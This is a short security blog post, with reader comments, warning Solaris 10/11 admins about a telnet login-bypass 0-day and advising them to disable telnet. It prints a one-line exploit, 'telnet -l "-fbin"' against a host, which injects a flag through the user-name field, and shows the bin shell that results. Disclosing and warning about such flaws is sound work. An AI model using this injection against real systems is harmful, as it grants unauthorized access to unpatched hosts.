One more reason not to run telnet or Solaris 0-day == Trouble
We've all heard it before... Don't run telnet because it's a plain text protocol, it's an inherent security risk... Which is true, SSH just makes more sense and plenty of people are using SSH these days. This doesn't mean that everyone is though, so... *ATTENTION SOLARIS ADMINS** If you're still running telnet on Solaris 10 or 11 (SunOS 5.10 or 5.11)... Turn it off. An email was released on Full Disclosure earlier with a new 0-day for Solaris 10/11 that's so easy it makes my skin crawl. This pdf was linked in the email which gives details and a small shell script to perform the exploit. It seemed surprising that this existed and had not been previously found, so of course I had to try it out.
C:\Documents and Settings\treguly>telnet -l "-fbin" X.X.X.X
Last login: Sun Feb 11 00:24:44 from XXXX
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
The result is more than a little frightening...
A Hat Tip for this goes to Maynor and the Errata Security Blog for informing me of this issue.
[UPDATE] While it was initially rumoured that this didn't affect the root account, this is not the case... root logins are possible... it is dependent on configuration. More info on the nCircle Blog.
hi there,
I have a sunos 5.10 box at my work. I real newbie in sunos so i really need your help … can you please tell me how to close telnet or if there is a patch for this vuln.
thx
You can disable telnet with the command: svcadm disable telnet
There was an interim patch available from Sun but when I pull the page up now it seems to be gone, perhaps they’ve issued a full patch.. but I’m not sure where it is located.
thx a lot . if you find the patch pls paste the link here thanks
COIS# svcadm disable telnet
svcadm: not found
COIS#